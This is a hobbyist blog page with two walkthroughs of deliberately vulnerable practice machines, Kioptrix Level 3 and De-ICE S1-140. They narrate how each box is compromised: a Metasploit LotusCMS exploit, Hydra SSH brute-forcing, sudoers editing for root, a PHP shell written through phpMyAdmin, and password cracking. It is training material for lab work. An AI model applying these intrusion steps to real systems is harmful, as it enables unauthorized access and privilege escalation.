Showing posts with label metasploit. Show all posts
Showing posts with label metasploit. Show all posts

Tuesday, May 27, 2014

[WALKTHROUGH] KIOPTRIX Level 3

Sups h4x0rsss.... :)

Sorry that I intentionally skip on posting my 'walkthrough' on Kioptrix Level 2. In fact, I have already pwned the box but those snapshots taken during my process are stored in another machine... :((

Things are getting complicated lately as I have lost my precious internet connection for several days which cause me having some bad time in updating my blog post. However, worry not much that internet is coming back again soon enough... :))

And, I will be sure to update my Kioptrix Level 2 walkthrough at soonest possible...


Delay no more, here I present to you the Level 3 of Kioptrix series... which I think is pretty easy to complete the challenge. However, I am sure there are some other penetration way... just that I happened to penetrate through the easy one huh...


OK! Let's start with finding the IP address of the target box since it is using DHCP...

Here it is, the IP address of our target box is 192.168.17.142... ( It's pretty easy to differentiate the target IP as we all know that that is the only strange IP wandering around... :p )

Next step is the reconnaissance process... as usual here comes the big help of Nmap...
 

 Results told us that there are only 2 services running on the box, which are the SSH and the HTTP service...

Let's bring it to further aggressive mode and see if we are able to harvest some more information of the target box...


Not fruitful enough...

Not to be disappointed, the reconnaissance process is not ended yet... :p

Let's take a look on their website...


Ahaaa... we found a login page for the website... tried some easy combination "admin::admin", "admin::password", "admin::letmein"...

Of course they leave such stupid careless mistakes here... Tried with mysql injection by assuming the input is not sanitized and they are running MySQL database...

Again another rejection by the box... :(

Looks carefully and we notice that it is "Proudly powered by LotusCMS"! Some Google-fu tells me that Lotus CMS version 3.0 is vulnerable...

So here we bring up the msfconsole and look for lotuscms vulnerability... :))


Simple and straightforward enough that we only have 1 choice for our attacking towards the target box...


Setting up the info required by the exploit framework... and we're ready to GO!


After some MAGIK done by Metasploit, we just got another shell on the target box... :))

Tried running some local escalate exploit but does not work... :(

After banging around the walls, we are still stuck at "www-data" privilege, which is not our ultimate goal... :(

So after poking around the files/documents inside the box, we collected some username from /etc/passwd for cracking purpose... ( You leave me no choice! )


Launching Hydra against SSH service on our target box...

After some times, password surfaced with the username "loneferret"...


Next step to do is SSH into the target box using the credentials found earlier...

However, the user "loneferret" does not have sudo privilege for shell... :(


However, we notice that user "loneferret" is able to execute the ht editor...

After execute the ht editor with sudo privilege...


We can edit the sudoers list in the /etc/sudoers using ht editor with sudo privilege...

Pressing on "F3" will pop up the "Open Windows"... navigate to /etc/sudoers directly by typing in the address bar at the top...

Then, we add in the bash shell command as sudo privilege under user "loneferret"... and press "F2" to save...


Quit the ht editor and check again on the available sudo command for user "loneferret"...


 And, shoot in the MAGIK words "sudo /bin/bash" and we are given a root shell on the target box... :))


Posted by at No comments:
Labels: , , , , , , , , , , , , , , , , ,

Thursday, May 15, 2014

[WALKTHROUGH] De-ICE_S1-140

Seems like this will be the final challenge in De-ICE series... and I really enjoyed myself throughout the full series...

Hopefully will see some coming challenges to be added on this series again..  :)

For this moment, let's heads on and attack the final box...

This box is running with DHCP enabled... Hence, ping sweep throughout the network is required in order to find out the real ip address of the target box...

Here, we use the Netdiscover in order to find out the ip address of the target box, which is 192.168.17.141


Never forgets to recon the box and grab as much info as possible...


Aggressive mode...


Checking out their website... some quotes by Bill Gates <3 br="">


Seems like nothing we can get from the website (there is a hints section in the website)...

Let's try with Dirbuster and see if we might get some interesting sub-directory....




Some interesting sub-directory founded: forum, phpmyadmin, webmail...

Let's head over the forum section and see what might we get from there...


Oops... some careless mistake done by one of the staff "mbrown" who leaked his own password in the forum...   ;)

Let's try login to the forum using 'mbrown' account credentials...


And, we can see his email account after login to his profile...

Since we got an email account, might as well try login to his webmail and see if it is successful...


BOOM! Another password found for the "root" account...  XD


From this email, we can find out that "mbrown" using the same password for a several services... (as we can see even from this stage... 'mbrown' is using the same password for his forum and email account... )

Since now we got the 'root' account for phpmyadmin... let's check out the phpmyadmin as well...



We able to login successfully using the "root" account found... and we can see some password hashes in the database as well... :)



By searching the hash using Google search engine, we can easily cracked found the password for two of the accounts there...

Now, we try ftp into the box using the credentials we found just now...


Fortunately enough, we can still able to access the ftp service successfully using the 'rhedley' account...


By sniffing around for any suspicious files, we see an encrypted file located in the ftp folder... Sadly to tell that we do not have the key to decrypt the file at the moment, but we may download the file to our local box for further usage later...

Seems like we are out of our way to get a shell on the box... :(


After Googling around, we found that /forum/templates_c/ is actually writable... we shed some lights here...

Quickly login into the phpmyadmin, we create a new table 'shell' under the 'test' database..


Generate a php shell payload...

 
Insert the code into column '1' in table 'shell'...



And insert into dumpfile...


Refresh the page at /forum/templates_c/ and we can see a newly created phpshell.php file...   :)


Before running the shell payload, we need to prepare some handler in order catch handle the exploit...



We now have a shell on the target box, but the shell is running with minimal privilege...

Let's try with the 'rhedley' account we found earlier...


Another round of scorching around...



And we found the key to decrypt the encrypted file we retrieved earlier... :)

After decrypt the file, we found that it is actually a copy of 'etc' folder of the target box... now we will need to crack the password in order to get sudo privilege on the box...


By using the darkc0de wordlist, we able to get the password for the 'sraines' account, which is previous account of 'swillard'...

So, let's try change the user to swillard but using the password found for 'sraines'... "brillantissimo"!


Now, we got a proper root shell on the target box... checking out the flag secret.jpg and we are rewarded with a cake!  :)


A very rewarding challenge... :)

Posted by at No comments:
Labels: , , , , , , , , , , , , , , ,
Subscribe to: Posts (Atom)